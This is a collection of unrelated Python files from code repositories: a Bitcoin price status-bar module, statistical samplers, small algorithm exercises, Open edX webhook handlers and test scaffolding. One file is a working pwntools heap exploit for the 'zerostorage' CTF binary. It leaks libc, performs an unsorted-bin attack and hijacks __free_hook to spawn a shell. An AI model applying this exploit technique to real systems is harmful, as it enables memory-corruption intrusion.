| Aasthaengg/IBMdataset | Python_codes/p02691/s742005940.py | s742005940.py | py | 239 | python | en | code | 0 | github-code | 90 |
14079723371 | # -*- coding: utf-8 -*-
from base import PollingModule
import urllib2
import json
class BitcoinPriceModule(PollingModule):
    """i3 status-bar module that polls Coinbase for BTC buy/sell prices.

    Python 2 code (urllib2).  Draws prices and a sparkline history into the
    bar 'ports' provided by the PollingModule base class.
    """
    # Sparkline glyphs; index 4 (middle bar) is the baseline/placeholder.
    bars = u' ▁▂▃▄▅▆▇█'
    def __init__(self, cfg):
        PollingModule.__init__(self, 'bitcoin')
        self.buy_price = "?"
        self.sell_price = "?"
        self.config(cfg)
        self.history = [-1] * 10  # -1 marks "no sample yet"
    def config(self, cfg):
        # Apply user configuration with defaults.
        # NOTE(review): self.channels never gets a 'history' key here, yet
        # onUpdate()/onDraw() read self.channels['history'] — confirm the
        # base class fills it in, otherwise this is a KeyError.
        self.interval = cfg.get('interval', 600)
        self.coinbase_api_endpoint = cfg.get('coinbase_api_endpoint', 'https://coinbase.com/api')
        self.coinbase_api_version = cfg.get('coinbase_api_version', 'v1')
        self.labelColor = cfg.get('label_color', "#AAAAAA")
        self.amountColor = cfg.get('amount_color', "#348eda")
        self.channels = {'buy_price': False, 'sell_price': False}
        self.history = [-1] * cfg.get('history_len', 10)
        self.hist_scale = cfg.get('history_scale', 1)
    def onUpdate(self):
        # Fetch only what the enabled channels need; history keeps a sliding
        # window of the most recent buy prices.
        if self.channels['buy_price'] or self.channels['history']:
            self.buy_price = self.coinbase_query(action='buy')
        if self.channels['sell_price']:
            self.sell_price = self.coinbase_query(action='sell')
        if self.channels['history']:
            self.history = self.history[1:] + [float(self.buy_price)]
        return True
    def coinbase_query(self, action='buy'):
        # GET <endpoint>/<version>/prices/<action> and return the subtotal amount.
        api_endpoint = "%s/%s/prices/%s" % (self.coinbase_api_endpoint, self.coinbase_api_version, action)
        response = urllib2.urlopen(api_endpoint)
        json_string = response.read()
        obj = json.loads(json_string)
        return obj["subtotal"]["amount"]
    def onDraw(self):
        # Render "[Buy:<price>]" / "[Sell:<price>]" and the history sparkline.
        if self.channels['buy_price']:
            port = self.ports['buy_price']
            port.clear()
            port.add("[Buy:", color=self.labelColor)
            port.add(self.buy_price, color=self.amountColor, sepWidth=0)
            port.add("]", color=self.labelColor)
        if self.channels['sell_price']:
            port = self.ports['sell_price']
            port.clear()
            port.add("[Sell:", color=self.labelColor)
            port.add(self.sell_price, color=self.amountColor, sepWidth=0)
            port.add("]", color=self.labelColor)
        if self.channels['history']:
            port = self.ports['history']
            port.clear()
            realvals = [x for x in self.history if x != -1]
            xavg = sum(realvals) / len(realvals)
            xmin = min(realvals)
            xmax = max(realvals)
            # NOTE(review): `baseline` is computed but never used — the
            # sparkline below centers on xavg instead; confirm intent.
            baseline = xavg
            if xavg + 4 * self.hist_scale < xmax:
                baseline = xmax - 4 * self.hist_scale
            if xavg - 4 * self.hist_scale > xmin:
                baseline = xmin + 4 * self.hist_scale
            port.add("[", color=self.labelColor, sepWidth=0)
            for h in self.history:
                if h == -1:
                    # No sample yet: draw the middle (baseline) bar.
                    port.add(self.bars[4], color=self.amountColor, sepWidth=0)
                else:
                    # Map deviation from the average to a bar index in [0, 8].
                    val = 4 + int((h - xavg) / self.hist_scale)
                    val = max(min(val, 8), 0)
                    port.add(self.bars[val], color=self.amountColor, sepWidth=0)
            port.add("]", color=self.labelColor)
| soupytwist/i3pandabar | module_bitcoin.py | module_bitcoin.py | py | 3,227 | python | en | code | 0 | github-code | 90 |
29528950120 | import math
from matplotlib import pyplot as plt
def CalcExp(x):
    """Return e**x.

    Improvement: math.exp(x) instead of math.e ** x — the idiomatic and
    more accurate (correctly-rounded C library) spelling.
    """
    return math.exp(x)
def DistributionF(firstChi2, secondChi2):
    """Return the element-wise ratios firstChi2[i] / secondChi2[i].

    Used to build F-distributed samples from two chi-square sample lists;
    iterates over the length of the first list (as the original did).
    """
    return [firstChi2[i] / secondChi2[i] for i in range(len(firstChi2))]
def DistributionExponential(normalDist):
    """Map each sample through -log10(v) / 100, skipping non-positive values
    (log10 is undefined for them)."""
    transformed = []
    for value in normalDist:
        if value <= 0:
            continue
        transformed.append(-math.log10(value) / 100)
    return transformed
def DistributionGamma(alfa, betta, firstRandomNumbers, secondRandomNumbers, totalVariables):
    """Accept-reject gamma(alfa, betta) sampler driven by two uniform streams.

    Consumes pairs from the two input lists, accepting at most
    *totalVariables* variates.  NOTE(review): the structure resembles the
    Cheng/Marsaglia acceptance-rejection method, which is defined with the
    natural logarithm — this code uses log10 throughout; confirm against
    the intended reference before relying on the output distribution.
    """
    # Method constants derived from the shape parameter alfa.
    a = 1 / math.sqrt(2 * alfa - 1)
    b = alfa - math.log10(4)
    q = alfa + (1 / alfa)
    tetta = 4.5
    d = 1 + math.log10(tetta)
    length = min(len(firstRandomNumbers), len(secondRandomNumbers))
    randomVariables = []
    for i in range(0, length):
        # Stop once enough variates have been accepted.
        if len(randomVariables) == totalVariables:
            break
        z_i = (firstRandomNumbers[i] ** 2) * secondRandomNumbers[i]
        v_i = a * math.log10(firstRandomNumbers[i] / (1 - secondRandomNumbers[i]))
        y_i = alfa * CalcExp(v_i)
        w_i = b + (q * v_i) - y_i
        randomVariable = 0
        # Squeeze/acceptance test; accepted candidates are scaled by betta.
        if w_i + d - tetta * z_i > 0 or w_i >= math.log10(z_i):
            randomVariable = betta * y_i
        if randomVariable:
            randomVariables.append(randomVariable)
    return randomVariables
def DrawGraph(data):
    """Show an 80-bin histogram of *data* (blocks until the window is closed)."""
    plt.hist(data, 80)
    plt.show()
| yaitox/RandomGenerator | src/Variables/randomVariable.py | randomVariable.py | py | 1,706 | python | en | code | 0 | github-code | 90 |
15296609506 | from pwn import *
# init: run the target with the matching libc preloaded.
os.environ['LD_PRELOAD'] = '/home/dumbass/Desktop/Problem/zerostorage/libc-2.19.so'
r = process('./zerostorage')
e = ELF('./zerostorage')
libc = e.libc
context.arch = 'amd64'
#context.log_level = 'debug'
# --- Menu wrappers for the target binary ---
def insert(content):
    r.sendlineafter('Your choice: ', '1')
    r.sendlineafter('Length of new entry: ', str(len(content)))
    r.sendafter('Enter your data: ', content)
def update(index, content):
    r.sendlineafter('Your choice: ', '2')
    r.sendlineafter('Entry ID: ', str(index))
    r.sendlineafter('Length of entry: ', str(len(content)))
    r.sendafter('Enter your data: ', content)
def merge(fromid, toid):
    r.sendlineafter('Your choice: ', '3')
    r.sendlineafter('Merge from Entry ID: ', str(fromid))
    r.sendlineafter('Merge to Entry ID: ', str(toid))
def delete(index):
    r.sendlineafter('Your choice: ', '4')
    r.sendlineafter('Entry ID: ', str(index))
def view(index):
    r.sendlineafter('Your choice: ', '5')
    r.sendlineafter('Entry ID: ', str(index))
def list_c():
    r.sendlineafter('Your choice: ', '6')
# create two entries to enable merge
insert('/bin/sh\x00'+'A'*(0x1f0-8))
insert('A'*0x1f0)
# merge entry 1 with itself so entries 1 and 2 point to the same chunk
merge(1, 1)
# padding to avoid consolidation with the top chunk
insert('A'*0x1f0)
insert('A'*0x1f0)
# cause use-after-free and heap overflow, then leak libc from the freed
# chunk's unsorted-bin fd pointer
delete(1)
view(2)
r.recvuntil('Entry No.2:\n')
sbin = u64(r.recv(6)+'\x00\x00')
libc_base = sbin - libc.symbols['__malloc_hook'] - 0x68
log.info('libc base: %#x' % libc_base)
system = libc_base + libc.symbols['system']
__malloc_hook = libc_base + libc.symbols['__malloc_hook']
__free_hook = libc_base + libc.symbols['__free_hook']
global_max_fast = __free_hook + 0x50
log.info('global_max_fast: %#x' % global_max_fast)
# overwrite global_max_fast by unsorted bin attack (forge bk so the next
# unsorted-bin allocation writes a libc pointer over global_max_fast)
insert('A'*0x1f0)
insert('A'*0x200)#padding
delete(3)
update(2, 'A'*0x1f0+p64(0)+p64(0x201)+p64(__malloc_hook+0x68)+p64(global_max_fast-0x10)+'A'*0x1d0)
insert('A'*0x1f0)
# exploit: with global_max_fast huge, a freed 0x200 chunk is treated as a
# fastbin whose list head lands near __free_hook; overwrite it with system
delete(3)
update(2, 'A'*0x1f0+p64(0)+p64(0x201)+p64(__free_hook-0x50-9)+p64(0)+'A'*0x1d0)
insert('A'*0x1f0)
insert('\x00'*(0x50-7)+p64(system)+'\x00'*(0x198+7))
# free entry 0 ('/bin/sh...') -> __free_hook('/bin/sh') -> shell
delete(0)
r.interactive()
| Kyle-Kyle/Pwn | heap_overflow/zerostorage_4.0/writeup/solve.py | solve.py | py | 2,204 | python | en | code | 16 | github-code | 90 |
28063249981 | # Joseph's problem
'''
In a closed circle of people, starting from an index, we eliminate the person k places away, then repeat from the eliminated position. The last person standing wins.
TC: O(n^2) — each of the n-1 eliminations performs an O(n) list deletion.
'''
def solve(index, arr, k):
if len(arr) == 1:
return arr
to_die = (index + k - 1) % len(arr)
print("to die", to_die, arr[to_die])
del arr[to_die]
solve(to_die, arr, k)
return arr
if __name__ == '__main__':
n = int(input())
arr = [i for i in range(n)]
print(arr)
k = int(input())
print(solve(0, arr, k)) | gowthamkishorem/DSA_GeeksforGeeks-Self-Placed- | DSA/001_Recursion/GFG/josephs.py | josephs.py | py | 547 | python | en | code | 0 | github-code | 90 |
6499580439 | n = int(input("Enter number of processes : "))
#p = [{"id":0, "arr":0, "burst":0}]
arrival = []
burst = []
finish = []
tat = []
wt = []
print()
print("Kindly enter the arrival time in ascending order\n")
for i in range(n):
val = int(input(f"Enter arrival time for P{i} : "))
arrival.append(val)
print()
for i in range(n):
val = int(input(f"Enter CPU burst time for P{i} : "))
burst.append(val)
t=0
for i in range(n):
t += burst[i]
finish.append(t)
for i in range(n):
t = finish[i] - arrival[i]
tat.append(t)
t = tat[i] - burst[i]
wt.append(t)
#for i in range(n):
print('\n')
print("processes \tarrival time \tburst time \tfinish time \tTAT \twaiting time")
for i in range(n):
print(f"P{i} \t\t{arrival[i]} \t\t{burst[i]} \t\t{finish[i]} \t\t{tat[i]} \t{wt[i]}")
avg_wt = sum(wt)
avg_wt = avg_wt/n
print(f"\nAverage waiting time = {avg_wt}")
5
0
2
5
8
12
18
5
3
7
4
3
0
0
0
24
3
3
| Nayan-das08/CPU-Scheduling | fcfs.py | fcfs.py | py | 939 | python | en | code | 0 | github-code | 90 |
20379727659 | import numpy as np
import matplotlib.pyplot as plt
def datagen(n, fun=None):
if fun == 'sin':
x = np.linspace(-10, 10, n)
else:
x = np.linspace(0, 5, n)
X_train = np.empty(0)
X_test = np.empty(0)
Y_train = np.empty(0)
Y_test = np.empty(0)
for i in range(n):
if fun == 'sin':
y = np.random.normal(np.sin(x[i])/x[i], 0.05)
else:
y = np.random.normal(2*x[i]+1, 0.2)
if i%3 == 0:
X_train = np.append(X_train, x[i])
Y_train = np.append(Y_train, y)
else:
X_test = np.append(X_test, x[i])
Y_test = np.append(Y_test, y)
return X_train, X_test, Y_train, Y_test
def theta_star(X_train, Y_train):
X_train = np.vstack((X_train, np.ones(X_train.shape[0])))
g = np.linalg.inv(np.dot(X_train, X_train.T))
return np.dot(np.dot(g, X_train), Y_train)
def polyreg(X_train, Y_train, p):
n = X_train.shape[0]
X = np.ones((p+1, n))
for i in range(n):
for j in range(p+1):
X[j, i] = np.power(X_train[i], p-j)
# return theta_star(X, Y_train)
g = np.linalg.inv(np.dot(X, X.T))
return np.dot(np.dot(g, X), Y_train)
def f(x, theta_star):
return np.vdot(theta_star, x)
# d = theta_star.shape[0]
# return np.sum([theta_star[j]*np.power(x, d-j-1) for j in range(d)])
def get_err_train(X_train, Y_train, p):
theta_star = polyreg(X_train, Y_train, p)
err = []
for i in range(X_train.shape[0]):
err.append(loss(X_train[i], Y_train[i], theta_star))
return np.sum(err)
#def get_err_train(X_train, Y_train):
# absc=np.arange(1,18)
# ords=[]
# for p in range(1,18):
# ords.append(err_train(X_train, Y_train, p))
# return absc,ords
#def loss(X,Y,p):
# theta_star=polyreg(X,Y,p)
# err=[]
# for i in range(len(X)):
# err.append(np.square(Y[i]-f(X[i],theta_star)))
# return np.squre()
def loss(x, y, theta):
return np.square(y - f(x, theta))
def aff_courbe(theta):
absc=np.arange(-10,10,0.1)
ords=np.zeros(len(absc))
for i in range(len(absc)):
ords[i]=f(absc[i], theta)
# ords[i]=np.sum([theta[p]*np.power(absc[i],len(theta)-p-1) for p in range(len(theta))])
plt.plot(absc,ords,'k-')
X_train, X_test, Y_train, Y_test = datagen(90)
plt.figure()
plt.plot(X_train, Y_train, '.r', X_test, Y_test, '.b')
theta_star = theta_star(X_train, Y_train)
#aff_courbe(theta_star)
plt.plot([theta_star[0]*x + theta_star[1] for x in range(6)], 'k')
X_train, X_test, Y_train, Y_test = datagen(90,fun='sin')
plt.figure()
plt.plot(X_train, Y_train, '.r', X_test, Y_test, '.b')
theta_star = polyreg(X_train, Y_train, 8)
aff_courbe(theta_star)
plt.figure()
absc = np.arange(1, 18)
train_ords = []
test_ords = []
for p in range(1, 18):
train_ords.append(get_err_train(X_train, Y_train, p))
#train_absc,train_ords=get_train_err(X_train,Y_train)
#test_absc,test_ords=get_train_err(X_test,Y_test)
plt.plot(absc, train_ords, 'g-')
theta_star = polyreg(X_train, Y_train, 19)
plt.figure()
plt.plot(X_train, Y_train, '.r')
aff_courbe(theta_star)
| iver62/A2DI | tp3/tp3_ex2.py | tp3_ex2.py | py | 3,132 | python | en | code | 0 | github-code | 90 |
18115667639 | import sys
input = sys.stdin.readline
if __name__ == '__main__':
n = int(input())
A = list(map(int, input().split()))
cnt = 0
def merge(A, left, mid, right):
global cnt
n1 = mid - left
n2 = right - mid
L=[10**9+1]*(n1+1) # 先に入れきった方の配列をヌルポにしないため
R=[10**9+1]*(n2+1)
for i in range(n1):
L[i] = A[left + i]
for i in range(n2):
R[i] = A[mid + i]
i = 0
j = 0
for k in range(left, right):
cnt += 1
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
j += 1
def mergeSort(A, left, right):
if left + 1 < right:
mid = (left + right) // 2
mergeSort(A, left, mid)
mergeSort(A, mid, right)
merge(A, left, mid, right)
mergeSort(A, 0, n)
print(*A)
print(cnt)
| Aasthaengg/IBMdataset | Python_codes/p02272/s731883096.py | s731883096.py | py | 840 | python | en | code | 0 | github-code | 90 |
1518682291 | from __future__ import unicode_literals, print_function
import sys
import json
import re
import bugsnag
import requests
import yaml
from flask import request, render_template, make_response, url_for
from flask_dance.contrib.github import github
from flask_dance.contrib.jira import jira
from openedx_webhooks import app
from openedx_webhooks.utils import memoize, paginated_get
from openedx_webhooks.views.jira import get_jira_custom_fields
@app.route("/github/pr", methods=("POST",))
def github_pull_request():
try:
event = request.get_json()
except ValueError:
raise ValueError("Invalid JSON from Github: {data}".format(data=request.data))
bugsnag_context = {"event": event}
bugsnag.configure_request(meta_data=bugsnag_context)
if "pull_request" not in event and "hook" in event and "zen" in event:
# this is a ping
repo = event.get("repository", {}).get("full_name")
print("ping from {repo}".format(repo=repo), file=sys.stderr)
return "PONG"
pr = event["pull_request"]
repo = pr["base"]["repo"]["full_name"].decode('utf-8')
if event["action"] == "opened":
return pr_opened(pr, bugsnag_context)
if event["action"] == "closed":
return pr_closed(pr, bugsnag_context)
if event["action"] == "labeled":
return "Ignoring labeling events from github", 200
print(
"Received {action} event on PR #{num} against {repo}, don't know how to handle it".format(
action=event["action"],
repo=pr["base"]["repo"]["full_name"].decode('utf-8'),
num=pr["number"],
),
file=sys.stderr
)
return "Don't know how to handle this.", 400
@app.route("/github/rescan", methods=("GET", "POST"))
def github_rescan():
"""
Used to pick up PRs that might not have tickets associated with them.
"""
if request.method == "GET":
# just render the form
return render_template("github_rescan.html")
repo = request.form.get("repo") or "edx/edx-platform"
bugsnag_context = {"repo": repo}
bugsnag.configure_request(meta_data=bugsnag_context)
url = "/repos/{repo}/pulls".format(repo=repo)
created = {}
for pull_request in paginated_get(url, session=github):
bugsnag_context["pull_request"] = pull_request
bugsnag.configure_request(meta_data=bugsnag_context)
if not get_jira_issue_key(pull_request) and not is_edx_pull_request(pull_request):
text = pr_opened(pull_request, bugsnag_context=bugsnag_context)
if "created" in text:
jira_key = text[8:]
created[pull_request["number"]] = jira_key
print(
"Created {num} JIRA issues. PRs are {prs}".format(
num=len(created), prs=created.keys(),
),
file=sys.stderr
)
resp = make_response(json.dumps(created), 200)
resp.headers["Content-Type"] = "application/json"
return resp
@app.route("/github/install", methods=("GET", "POST"))
def github_install():
if request.method == "GET":
return render_template("install.html")
repo = request.form.get("repo", "")
if repo:
repos = (repo,)
else:
repos = get_repos_file().keys()
secure = request.is_secure or request.headers.get("X-Forwarded-Proto", "http") == "https"
api_url = url_for(
"github_pull_request", _external=True,
_scheme="https" if secure else "http",
)
success = []
failed = []
for repo in repos:
url = "/repos/{repo}/hooks".format(repo=repo)
body = {
"name": "web",
"events": ["pull_request"],
"config": {
"url": api_url,
"content_type": "json",
}
}
bugsnag_context = {"repo": repo, "body": body}
bugsnag.configure_request(meta_data=bugsnag_context)
hook_resp = github.post(url, json=body)
if hook_resp.ok:
success.append(repo)
else:
failed.append((repo, hook_resp.text))
if failed:
resp = make_response(json.dumps(failed), 502)
else:
resp = make_response(json.dumps(success), 200)
resp.headers["Content-Type"] = "application/json"
return resp
@memoize
def github_whoami():
self_resp = github.get("/user")
rate_limit_info = {k: v for k, v in self_resp.headers.items() if "ratelimit" in k}
print("Rate limits: {}".format(rate_limit_info), file=sys.stderr)
if not self_resp.ok:
raise requests.exceptions.RequestException(self_resp.text)
return self_resp.json()
@memoize
def get_people_file():
people_resp = requests.get("https://raw.githubusercontent.com/edx/repo-tools/master/people.yaml")
if not people_resp.ok:
raise requests.exceptions.RequestException(people_resp.text)
return yaml.safe_load(people_resp.text)
@memoize
def get_repos_file():
repo_resp = requests.get("https://raw.githubusercontent.com/edx/repo-tools/master/repos.yaml")
if not repo_resp.ok:
raise requests.exceptions.RequestException(repo_resp.text)
return yaml.safe_load(repo_resp.text)
def is_edx_pull_request(pull_request):
"""
Was this pull request created by someone who works for edX?
"""
people = get_people_file()
author = pull_request["user"]["login"].decode('utf-8')
return (author in people and
people[author].get("institution", "") == "edX")
def pr_opened(pr, bugsnag_context=None):
bugsnag_context = bugsnag_context or {}
user = pr["user"]["login"].decode('utf-8')
if is_edx_pull_request(pr):
# not an open source pull request, don't create an issue for it
print(
"@{user} opened PR #{num} against {repo} (internal PR)".format(
user=user, repo=pr["base"]["repo"]["full_name"],
num=pr["number"]
),
file=sys.stderr
)
return "internal pull request"
issue_key = get_jira_issue_key(pr)
if issue_key:
msg = "Already created {key} for PR #{num} against {repo}".format(
key=issue_key,
num=pr["number"],
repo=pr["base"]["repo"]["full_name"],
)
print(msg, file=sys.stderr)
return msg
repo = pr["base"]["repo"]["full_name"].decode('utf-8')
people = get_people_file()
custom_fields = get_jira_custom_fields()
if user in people:
user_name = people[user].get("name", "")
else:
user_resp = github.get(pr["user"]["url"])
if user_resp.ok:
user_name = user_resp.json().get("name", user)
else:
user_name = user
# create an issue on JIRA!
new_issue = {
"fields": {
"project": {
"key": "OSPR",
},
"issuetype": {
"name": "Pull Request Review",
},
"summary": pr["title"],
"description": pr["body"],
custom_fields["URL"]: pr["html_url"],
custom_fields["PR Number"]: pr["number"],
custom_fields["Repo"]: pr["base"]["repo"]["full_name"],
custom_fields["Contributor Name"]: user_name,
}
}
institution = people.get(user, {}).get("institution", None)
if institution:
new_issue["fields"][custom_fields["Customer"]] = [institution]
bugsnag_context["new_issue"] = new_issue
bugsnag.configure_request(meta_data=bugsnag_context)
resp = jira.post("/rest/api/2/issue", json=new_issue)
if not resp.ok:
raise requests.exceptions.RequestException(resp.text)
new_issue_body = resp.json()
issue_key = new_issue_body["key"].decode('utf-8')
bugsnag_context["new_issue"]["key"] = issue_key
bugsnag.configure_request(meta_data=bugsnag_context)
# add a comment to the Github pull request with a link to the JIRA issue
comment = {
"body": github_pr_comment(pr, new_issue_body, people),
}
url = "/repos/{repo}/issues/{num}/comments".format(
repo=repo, num=pr["number"],
)
comment_resp = github.post(url, json=comment)
if not comment_resp.ok:
raise requests.exceptions.RequestException(comment_resp.text)
issue_url = "/repos/{repo}/issues/{num}".format(repo=repo, num=pr["number"])
label_resp = github.patch(issue_url, data=json.dumps({"labels": ["needs triage"]}))
if not label_resp.ok:
raise requests.exceptions.RequestException(label_resp.text)
print(
"@{user} opened PR #{num} against {repo}, created {issue} to track it".format(
user=user, repo=repo,
num=pr["number"], issue=issue_key,
),
file=sys.stderr
)
return "created {key}".format(key=issue_key)
def pr_closed(pr, bugsnag_context=None):
bugsnag_context = bugsnag_context or {}
repo = pr["base"]["repo"]["full_name"].decode('utf-8')
merged = pr["merged"]
issue_key = get_jira_issue_key(pr)
if not issue_key:
print(
"Couldn't find JIRA issue for PR #{num} against {repo}".format(
num=pr["number"], repo=repo,
),
file=sys.stderr
)
return "no JIRA issue :("
bugsnag_context["jira_key"] = issue_key
bugsnag.configure_request(meta_data=bugsnag_context)
# close the issue on JIRA
transition_url = (
"/rest/api/2/issue/{key}/transitions"
"?expand=transitions.fields".format(key=issue_key)
)
transitions_resp = jira.get(transition_url)
if not transitions_resp.ok:
raise requests.exceptions.RequestException(transitions_resp.text)
transitions = transitions_resp.json()["transitions"]
bugsnag_context["transitions"] = transitions
bugsnag.configure_request(meta_data=bugsnag_context)
transition_name = "Merged" if merged else "Rejected"
transition_id = None
for t in transitions:
if t["to"]["name"] == transition_name:
transition_id = t["id"]
break
if not transition_id:
# maybe the issue is *already* in the right status?
issue_url = "/rest/api/2/issue/{key}".format(key=issue_key)
issue_resp = jira.get(issue_url)
if not issue_resp.ok:
raise requests.exceptions.RequestException(issue_resp.text)
issue = issue_resp.json()
bugsnag_context["jira_issue"] = issue
bugsnag.configure_request(meta_data=bugsnag_context)
current_status = issue["fields"]["status"]["name"].decode("utf-8")
if current_status == transition_name:
msg = "{key} is already in status {status}".format(
key=issue_key, status=transition_name
)
print(msg, file=sys.stderr)
return "nothing to do!"
# nope, raise an error message
fail_msg = (
"{key} cannot be transitioned directly from status {curr_status} "
"to status {new_status}. Valid status transitions are: {valid}".format(
key=issue_key, new_status=transition_name,
curr_status=current_status,
valid=", ".join(t["to"]["name"].decode('utf-8') for t in transitions),
)
)
raise Exception(fail_msg)
transition_resp = jira.post(transition_url, json={
"transition": {
"id": transition_id,
}
})
if not transition_resp.ok:
raise requests.exceptions.RequestException(transition_resp.text)
print(
"PR #{num} against {repo} was {action}, moving {issue} to status {status}".format(
num=pr["number"], repo=repo, action="merged" if merged else "closed",
issue=issue_key, status="Merged" if merged else "Rejected",
),
file=sys.stderr
)
return "closed!"
def get_jira_issue_key(pull_request):
me = github_whoami()
my_username = me["login"]
comment_url = "/repos/{repo}/issues/{num}/comments".format(
repo=pull_request["base"]["repo"]["full_name"].decode('utf-8'),
num=pull_request["number"],
)
for comment in paginated_get(comment_url, session=github):
# I only care about comments I made
if comment["user"]["login"] != my_username:
continue
# search for the first occurrance of a JIRA ticket key in the comment body
match = re.search(r"\b([A-Z]{2,}-\d+)\b", comment["body"])
if match:
return match.group(0).decode('utf-8')
return None
def github_pr_comment(pull_request, jira_issue, people=None):
"""
For a newly-created pull request from an open source contributor,
write a welcoming comment on the pull request. The comment should:
* contain a link to the JIRA issue
* check for contributor agreement
* check for AUTHORS entry
* contain a link to our process documentation
"""
people = people or get_people_file()
people = {user.lower(): values for user, values in people.items()}
pr_author = pull_request["user"]["login"].decode('utf-8').lower()
# does the user have a signed contributor agreement?
has_signed_agreement = pr_author in people
# is the user in the AUTHORS file?
in_authors_file = False
name = people.get(pr_author, {}).get("name", "")
institution = people.get(pr_author, {}).get("institution", None)
if name:
authors_url = "https://raw.githubusercontent.com/{repo}/{branch}/AUTHORS".format(
repo=pull_request["head"]["repo"]["full_name"].decode('utf-8'),
branch=pull_request["head"]["ref"].decode('utf-8'),
)
authors_resp = github.get(authors_url)
if authors_resp.ok:
authors_content = authors_resp.text
if name in authors_content:
in_authors_file = True
doc_url = "http://edx.readthedocs.org/projects/userdocs/en/latest/process/overview.html"
issue_key = jira_issue["key"].decode('utf-8')
issue_url = "https://openedx.atlassian.net/browse/{key}".format(key=issue_key)
contributing_url = "https://github.com/edx/edx-platform/blob/master/CONTRIBUTING.rst"
agreement_url = "http://code.edx.org/individual-contributor-agreement.pdf"
authors_url = "https://github.com/{repo}/blob/master/AUTHORS".format(
repo=pull_request["base"]["repo"]["full_name"].decode('utf-8'),
)
comment = (
"Thanks for the pull request, @{user}! I've created "
"[{issue_key}]({issue_url}) to keep track of it in JIRA. "
"JIRA is a place for product owners to prioritize feature reviews "
"by the engineering development teams. "
"\n\nFeel free to add as much of the following information to the ticket:"
"\n- supporting documentation"
"\n- edx-code email threads"
"\n- timeline information ('this must be merged by XX date', and why that is)"
"\n- partner information ('this is a course on edx.org')"
"\n- any other information that can help Product understand the context for the PR"
"\n\nAll technical communication about the code itself will still be "
"done via the Github pull request interface. "
"As a reminder, [our process documentation is here]({doc_url})."
).format(
user=pull_request["user"]["login"].decode('utf-8'),
issue_key=issue_key, issue_url=issue_url, doc_url=doc_url,
)
if not has_signed_agreement or not in_authors_file:
todo = ""
if not has_signed_agreement:
todo += (
"submitted a [signed contributor agreement]({agreement_url}) "
"or indicated your institutional affiliation"
).format(
agreement_url=agreement_url,
)
if not has_signed_agreement and not in_authors_file:
todo += " and "
if not in_authors_file:
todo += "added yourself to the [AUTHORS]({authors_url}) file".format(
authors_url=authors_url,
)
comment += ("\n\n"
"We can't start reviewing your pull request until you've {todo}. "
"Please see the [CONTRIBUTING]({contributing_url}) file for "
"more information."
).format(todo=todo, contributing_url=contributing_url)
return comment
| lduarte1991/openedx-webhooks | openedx_webhooks/views/github.py | github.py | py | 16,291 | python | en | code | null | github-code | 90 |
1263342108 | """Tests execution of all module examples.
Tests should run as fast as possible to enable fast feedback during code
development. This test script aims to only test the execution of examples
e.g. to check for runtime errors if the module's api was changed,
but the exmaple has not yet been updated accordingly.
The directory of each example and the name of the example script to test needs
to be added to the example_list global variable.
No two examples can have the same script name. Note that if a test fails, then
the data structures, e.g. OpenCMISS objects, may not be finalised. Subsequent
tests may fail if they use the same data structures. it is therefore important
to address any test issues in numerical order. To address this issue, proper
cleanup of data structures, e.g. through a callback, is required whenever
an arbitrary error is encountered. This has not yet been implemented in the
module.
Authors: Thiranja Prasad Babarenda Gamage
Organisation: Auckland Bioengineering Institute, University of Auckland
"""
import os
import sys
import json
import unittest
from parameterized import parameterized
# Ignore tensorflow FutureWarning messages.
import warnings
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=FutureWarning)
import tensorflow
# Load in the metadata for the stf dataset that will be used for testing.
config_file_path = '../../study_configurations/stf.config'
with open(config_file_path) as config_file:
cfg = json.load(config_file)
config_file.close()
example_root_directory = os.path.abspath('../../examples')
# List of examples to test [example directory, example name].
# Note that some of these examples need to be run in order (e.g. output from
# 'machine_learning_mechanics/configuration_generator/' is required for most
# of the subsequent machine learning mechanics examples.
example_list = [
['confidence_intervals/', 'confidence_intervals']
]
# Postprocessing of example_list to address peculiarities in parameterized
# python module.
# "parameterized" module uses the first array value in the example_list as the
# test name. Reverse order of example directory and example name to allow the
# example name to be used as the test name.
example_list = [example[::-1] for example in example_list[::-1]]
# "parameterized" module runs through tests in reverse order. Reverse order of
# example list such that the examples run in the order as listed in the
# example list above.
example_list = example_list[::-1]
class TestExampleExecution(unittest.TestCase):
"""Class for testing execution of all examples in the example list.
Note that each example needs to have a main() function. To achieve
efficient testing, a test=True input argument is passed to the main()
function. The user can use this to bypass time consuming tasks e.g. for
mechanics, it can be used to skip the mechanics solves and quickly test the
infrastructure. Other tests are necessary to verify/validate that the
mechanics output is correct e.g. comparisons to expected output/analytic
solutions.
"""
@parameterized.expand(example_list)
def test(self, example_name, example_dir):
"""Test execution of the specified heart_mech example script.
The examples are run in their original directories. They have been
configured to export any output to 'results_test' folder in their
original directories.
Args:
example_name: Name of example to be tested.
example_dir: Directory name for the example.
"""
os.chdir(os.path.join(example_root_directory, example_dir))
# Add example directory (now the current working directory) to python
# sys path.
sys.path.insert(0, './')
# Import example script.
example = __import__(example_name)
# Execute example.
example.main(cfg, test=True)
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
| PrasadBabarendaGamage/parameter-estimation | tests/example_execution/execute_all_examples.py | execute_all_examples.py | py | 4,000 | python | en | code | 1 | github-code | 90 |
18236486296 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
diego/study.py was created on 2019/03/21.
file in :relativeFile
Author: Charles_Lai
Email: lai.bluejay@gmail.com
"""
from typing import Union
from typing import Type
from typing import Tuple
from typing import Set
from typing import Optional
from typing import List
from typing import Dict
from typing import Callable
from typing import Any
import os
from collections import defaultdict
import numpy as np
from sklearn.pipeline import make_pipeline, Pipeline
from sklearn.utils import validation
import joblib
import six
from diego.depens import logging
from diego.preprocessor import AutobinningTransform, LocalUncertaintySampling
from diego.trials import Trial
from diego import trials as trial_module
from diego import basic
from diego.core import Storage, generate_uuid
from diego import metrics as diego_metrics
from diego.ensemble_net import Ensemble, EnsembleStack, EnsembleStackClassifier, Combiner
from diego.classifier import LogisticRegressionSK, LogisticRegressionSMAC
import collections
import datetime
import math
import multiprocessing
import multiprocessing.pool
from multiprocessing import Queue
import pandas as pd
from six.moves import queue
import time
from sklearn.utils import check_X_y
from autosklearn.classification import AutoSklearnClassifier
from autosklearn.pipeline.components import classification
import gc
# Keep the cyclic garbage collector enabled; Study.optimize() drops large
# train/test matrices and calls gc.collect() explicitly to cap peak memory.
gc.enable()
# Register diego's custom logistic-regression components with the
# auto-sklearn classification component registry so trials can select them.
classification.add_classifier(LogisticRegressionSK)
classification.add_classifier(LogisticRegressionSMAC)
